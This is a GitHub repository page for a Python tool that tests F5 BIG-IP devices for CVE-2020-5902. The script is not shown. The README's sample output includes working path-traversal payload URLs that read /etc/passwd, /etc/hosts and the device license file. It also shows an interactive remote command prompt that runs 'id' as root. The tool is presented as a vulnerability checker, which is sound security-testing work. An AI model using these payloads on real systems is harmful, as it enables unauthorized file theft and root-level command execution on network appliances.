Skip to content

Python script to check CVE-2020-5902 (F5 BIG-IP devices).

Notifications You must be signed in to change notification settings

0xAbdullah/CVE-2020-5902

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 

Repository files navigation

CVE-2020-5902

Python script to check CVE-2020-5902 (F5 BIG-IP devices).

Usage

python3 CVE-2020-5902.py -i <IP>

Output

- Python script to check CVE-2020-5902 (F5 BIG-IP devices). | coded by Abdullah AlZahrani
[!] Your target: 127.0.0.1
[I] /etc/passwd readable
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

[I] /etc/hosts readable
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts

[I] /config/bigip.license readable
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license

[I] The target is vulnerable to CVE-2020-5902
[*] Check if the target vulnerable to RCE
[#] The target is vulnerable to RCE, let's GO.
Command > id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

About

Python script to check CVE-2020-5902 (F5 BIG-IP devices).

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages